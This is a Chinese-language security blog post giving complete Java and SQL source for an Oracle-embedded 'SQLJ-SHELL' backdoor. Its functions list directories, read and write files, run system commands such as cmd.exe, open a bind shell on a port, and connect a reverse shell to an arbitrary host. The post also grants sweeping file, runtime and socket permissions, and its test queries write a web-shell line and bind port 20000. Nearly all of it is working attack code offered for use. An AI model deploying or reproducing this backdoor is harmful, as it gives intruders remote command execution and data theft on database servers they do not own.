信息来源: I.S.T.O信息安全团队(http://blog.csdn.net/I_S_T_O)
author : kj021320
team: I.S.T.O
首先在ORACLE数据库建立JAVA对象, 这个版本的SQLJ-SHELL 只能支持正向连接,反向连接的时候有BUG 不建议使用,不知道是ORA支持JAVA的问题还是个人能力有限...要是有更好的方法可以方便交流QQ:282720807
create or replace and compile java source named isto as
import java.io.*;
import java.net.*;
public class ISTO{
//author: kj021320
//team: I.S.T.O
public static String listFolder(String path){
File f=null;
String str="";
f=new File(path);
String[] files=f.list();
if(files!=null)
for(int i=0;i<files.length;i++){
str+=files[i]+"/r/n";
}
return str;
}
public static String saveFile(String filepath,String value){
FileOutputStream fos=null;
try {
fos=new FileOutputStream(filepath);
fos.write(value.getBytes());
return "OK";
} catch (Exception e) {
return e.getMessage();
} finally{
if(fos!=null){
try {fos.close();} catch (Exception e) {}
}
}
}
public static String readFile(String pathfile,String code){
BufferedReader br=null;
String value="";
try {
br=new BufferedReader(new InputStreamReader(new FileInputStream(pathfile),code));
String s=null;
while((s=br.readLine())!=null){
value+=s;
}
return value;
} catch (Exception e) {
return e.getMessage();
} finally{
if(br!=null){try {br.close();} catch (IOException e) {}}
}
}
public static String execFile(String filepath,String code){
int i=0;
Runtime rt=Runtime.getRuntime();
String output="";
InputStreamReader isr = null;
char[] bufferC=new char[1024];
try{
Process ps=rt.exec(filepath);
isr=new InputStreamReader(ps.getInputStream(),code);
while((i=isr.read(bufferC,0,bufferC.length))!=-1){
output+=new String(bufferC,0,i);
}
return output;
}catch(Exception e){
return e.getMessage();
}finally{
if(isr!=null)try {isr.close();} catch (IOException e) {}
}
}
public static String bindShell(int port){
ServerSocket ss=null;
Socket s=null;
try {
ss = new ServerSocket(port);
s=ss.accept();
new optShell(ss,s).start();
return "OK";
} catch (Exception e) {
return e.getMessage();
}
}
public static String reverseShell(String host,int port){
Socket s=null;
try{
s=new Socket(host,port);
new optShell(null,s).start();
return "OK";
}catch(Exception e){
return e.getMessage();
}
}
public static class optShell extends Thread{
OutputStream os=null;
InputStream is=null;
ServerSocket ss;
Socket s;
public optShell(ServerSocket ss,Socket s){
this.ss=ss;
this.s=s;
try{
this.is=s.getInputStream();
this.os=s.getOutputStream();
}catch(Exception e){
if(os!=null)try {os.close();} catch(Exception ex) {}
if(is!=null)try {is.close();} catch(Exception ex) {}
if(s!=null)try {s.close();} catch(Exception ex) {}
if(ss!=null)try {ss.close();} catch(Exception ex) {}
}
}
public void run(){
BufferedReader br=new BufferedReader(new InputStreamReader(is));
String line="";
String cmdhelp="Command:/r/nlist /r/nsave/r/nread/r/nexec/r/nexit/r/n";
try {
//os.write(cmdhelp.getBytes());
line=br.readLine();
while(!"exit".equals(line)){
if(line.length()>3){
StringBuffer sb=new StringBuffer(line.trim());
String cmd=sb.substring(0, 4);
if(cmd.equals("list")){
os.write("input you path:/r/n".getBytes());
line=br.readLine();
os.write(listFolder(line).getBytes());
}else if("save".equals(cmd)){
os.write("input you filepath:/r/n".getBytes());
line=br.readLine();
os.write("input you value:/r/n".getBytes());
os.write(saveFile(line,br.readLine()).getBytes());
}else if("read".equals(cmd)){
os.write("input you filepath:/r/n".getBytes());
line=br.readLine();
os.write("input you code examle:GBK/r/n".getBytes());
os.write(readFile(line,br.readLine()).getBytes());
}else if("exec".equals(cmd)){
os.write("input you run filepath:/r/n".getBytes());
line=br.readLine();
os.write("input you code examle:GBK/r/n".getBytes());
os.write(execFile(line,br.readLine()).getBytes());
}else{
os.write(cmdhelp.getBytes());
}
}else{
os.write(cmdhelp.getBytes());
}
line=br.readLine();
}
} catch (Exception e) {
e.printStackTrace();
}finally{
if(os!=null)try {os.close();} catch(Exception e) {}
if(is!=null)try {is.close();} catch(Exception e) {}
if(s!=null)try {s.close();} catch(Exception e) {}
if(ss!=null)try {ss.close();} catch(Exception e) {}
}
}
}
}
以上建立完成之后 需要用ORACLE的函数调用JAVA的静态方法
--列举目录函数
create or replace function ISTO_LISTFOLDER(str varchar2) return varchar2
as language java name 'ISTO.listFolder(java.lang.String) return java.lang.String';
--保存文件函数
create or replace function ISTO_SAVEFILE(p varchar2,v varchar2) return varchar2
as language java name 'ISTO.saveFile(java.lang.String,java.lang.String) return java.lang.String';
--读文件函数
create or replace function ISTO_READFILE(p varchar2,c varchar2) return varchar2
as language java name 'ISTO.readFile(java.lang.String,java.lang.String) return java.lang.String';
--运行文件函数
create or replace function ISTO_EXECFILE(fp varchar2,c varchar2) return varchar2
as language java name 'ISTO.execFile(java.lang.String,java.lang.String) return java.lang.String';
--端口绑定 你可以telnet进去
create or replace function ISTO_BINDSHELL(port number) return varchar2
as language java name 'ISTO.bindShell(int) return java.lang.String';
以上函数转换操作之后 需要给JAVA授予访问权限
begin
Dbms_Java.Grant_Permission('用户名字','java.io.FilePermission','<<ALL FILES>>','read,write,execute,delete');
Dbms_Java.Grant_Permission('用户名字','java.lang.RuntimePermission','*','writeFileDescriptor');
Dbms_Java.grant_permission('用户名字','java.net.SocketPermission','*:*','accept,connect,listen,resolve');
end;
然后就可以进行文件操作以及 运行程序 开启网络!
以下为测试代码
SELECT ISTO_LISTFOLDER('/usr') FROM DUAL
SELECT ISTO_EXECFILE('C:/WINDOWS/system32/cmd.exe /c dir c:/','GBK') FROM DUAL;
SELECT ISTO_READFILE('/tmp/1.txt','GBK') FROM DUAL;
SELECT ISTO_SAVEFILE('/tmp/1.txt','一句话shell') FROM DUAL;
SELECT ISTO_BINDSHELL(20000) FROM DUAL
演示动画:http://www.isto.cn/vedio/ora-sqljshell.rar